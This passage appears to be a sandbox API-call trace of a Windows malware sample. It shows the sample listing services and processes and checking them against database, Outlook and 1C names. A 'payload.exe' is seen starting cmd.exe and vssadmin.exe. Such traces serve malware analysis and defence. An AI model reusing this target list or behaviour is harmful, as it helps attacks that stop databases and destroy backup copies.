lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0039.726] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0039.726] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0039.726] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0039.726] lstrlenW (lpString="WdiSystemHost") returned 13 [0039.726] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0039.726] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0039.726] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0039.726] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0039.726] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0039.726] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0039.726] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0039.726] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0039.726] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0039.726] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0039.726] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0039.726] lstrlenW (lpString="Winmgmt") returned 7 [0039.726] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0039.726] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0039.726] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0039.726] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0039.726] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0039.726] lstrlenW (lpString="WPDBusEnum") returned 10 [0039.726] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0039.726] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0039.726] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0039.726] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0039.726] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0039.727] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6c08c8 | out: hHeap=0x5d0000) returned 1 [0039.727] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c [0039.729] Process32FirstW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0039.729] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0039.730] lstrlenW (lpString="System") returned 6 [0039.730] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0039.730] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0039.730] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0039.730] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0039.730] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0039.730] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0039.730] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0039.730] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0039.731] lstrlenW (lpString="smss.exe") returned 8 [0039.731] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0039.731] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0039.731] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0039.731] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0039.731] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0039.731] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0039.731] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0039.731] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0039.732] lstrlenW (lpString="csrss.exe") returned 9 [0039.732] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0039.732] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0039.732] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0039.732] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0039.732] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0039.732] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0039.732] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0039.732] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0039.733] lstrlenW (lpString="wininit.exe") returned 11 [0039.733] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0039.733] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0039.733] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0039.733] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0039.733] lstrlenW (lpString="csrss.exe") returned 9 [0039.734] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0039.734] lstrlenW (lpString="winlogon.exe") returned 12 [0039.734] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0039.735] lstrlenW (lpString="services.exe") returned 12 [0039.735] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0039.735] lstrlenW (lpString="lsass.exe") returned 9 [0039.735] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0039.736] lstrlenW (lpString="lsm.exe") returned 7 [0039.736] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0039.737] lstrlenW (lpString="svchost.exe") returned 11 [0039.737] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0039.737] lstrlenW (lpString="svchost.exe") returned 11 [0039.737] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0039.738] lstrlenW (lpString="svchost.exe") returned 11 [0039.738] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0039.739] lstrlenW (lpString="svchost.exe") returned 11 [0039.739] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0039.739] lstrlenW (lpString="svchost.exe") returned 11 [0039.739] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0039.740] lstrlenW (lpString="audiodg.exe") returned 11 [0039.740] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0039.740] lstrlenW (lpString="svchost.exe") returned 11 [0039.741] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0039.741] lstrlenW (lpString="svchost.exe") returned 11 [0039.741] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0039.742] lstrlenW (lpString="dwm.exe") returned 7 [0039.742] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0039.742] lstrlenW (lpString="explorer.exe") returned 12 [0039.742] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0039.743] lstrlenW (lpString="spoolsv.exe") returned 11 [0039.743] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0039.744] lstrlenW (lpString="taskhost.exe") returned 12 [0039.744] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0039.744] lstrlenW (lpString="svchost.exe") returned 11 [0039.744] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0039.745] lstrlenW (lpString="taskeng.exe") returned 11 [0039.745] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0039.746] lstrlenW (lpString="taskhost.exe") returned 12 [0039.746] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="carried trinity.exe")) returned 1 [0039.746] lstrlenW (lpString="carried trinity.exe") returned 19 [0039.746] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="heaven.exe")) returned 1 [0039.747] lstrlenW (lpString="heaven.exe") returned 10 [0039.747] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dell.exe")) returned 1 [0039.748] lstrlenW (lpString="dell.exe") returned 8 [0039.748] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="consequence lonely nato.exe")) returned 1 [0039.760] lstrlenW (lpString="consequence lonely nato.exe") returned 27 [0039.761] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gotten_commit_philip.exe")) returned 1 [0039.761] lstrlenW (lpString="gotten_commit_philip.exe") returned 24 [0039.761] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="til ear equal.exe")) returned 1 [0039.762] lstrlenW (lpString="til ear equal.exe") returned 17 [0039.762] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="itunes-bring.exe")) returned 1 [0039.763] lstrlenW (lpString="itunes-bring.exe") returned 16 [0039.763] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tide_instances_ee.exe")) returned 1 [0039.763] lstrlenW (lpString="tide_instances_ee.exe") returned 21 [0039.763] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="philadelphia.exe")) returned 1 [0040.014] lstrlenW (lpString="philadelphia.exe") returned 16 [0040.014] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="litigation_rows_careers.exe")) returned 1 [0040.014] lstrlenW (lpString="litigation_rows_careers.exe") returned 27 [0040.015] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ict virginia cameras.exe")) returned 1 [0040.015] lstrlenW (lpString="ict virginia cameras.exe") returned 24 [0040.015] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x438, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fraud stuck.exe")) returned 1 [0040.016] lstrlenW (lpString="fraud stuck.exe") returned 15 [0040.016] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="innovative-essential-very.exe")) returned 1 [0040.016] lstrlenW (lpString="innovative-essential-very.exe") returned 29 [0040.017] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attended.exe")) returned 1 [0040.017] lstrlenW (lpString="attended.exe") returned 12 [0040.017] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tolerance-cartridges.exe")) returned 1 [0040.018] lstrlenW (lpString="tolerance-cartridges.exe") returned 24 [0040.018] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pan physician.exe")) returned 1 [0040.018] lstrlenW (lpString="pan physician.exe") returned 17 [0040.018] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="yesterday_sagem_indexes.exe")) returned 1 [0040.019] lstrlenW (lpString="yesterday_sagem_indexes.exe") returned 27 [0040.019] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="graphsheadlinehull.exe")) returned 1 [0040.020] lstrlenW (lpString="graphsheadlinehull.exe") returned 22 [0040.020] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="over-celebrity.exe")) returned 1 [0040.020] lstrlenW (lpString="over-celebrity.exe") returned 18 [0040.020] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0040.021] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0040.021] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="payload.exe")) returned 1 [0040.022] lstrlenW (lpString="payload.exe") returned 11 [0040.022] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x970, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x964, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0040.022] lstrlenW (lpString="cmd.exe") returned 7 [0040.022] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x988, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0040.023] lstrlenW (lpString="conhost.exe") returned 11 [0040.023] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x970, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0040.024] lstrlenW (lpString="vssadmin.exe") returned 12 [0040.024] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0040.024] lstrlenW (lpString="VSSVC.exe") returned 9 [0040.024] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.025] lstrlenW (lpString="svchost.exe") returned 11 [0040.025] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0040.026] CloseHandle (hObject=0x19c) returned 1 [0040.026] Sleep (dwMilliseconds=0x1f4) [0040.938] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x626d70 [0040.938] EnumServicesStatusExW (in: hSCManager=0x626d70, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 0 [0040.939] GetLastError () returned 0xea [0040.939] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x12c6) returned 0x6c08c8 [0040.939] EnumServicesStatusExW (in: hSCManager=0x626d70, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6c08c8, cbBufSize=0x12c6, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6c08c8, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 1 [0040.940] CloseServiceHandle (hSCObject=0x626d70) returned 1 [0040.940] lstrlenW (lpString="Appinfo") returned 7 [0040.940] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0040.940] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0040.940] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0040.940] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0040.940] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0040.940] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0040.940] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0040.940] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0040.941] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0040.941] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0040.941] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0040.941] lstrlenW (lpString="AudioSrv") returned 8 [0040.941] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0040.941] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0040.941] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0040.941] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0040.941] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0040.941] lstrlenW (lpString="BFE") returned 3 [0040.941] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0040.941] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0040.941] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 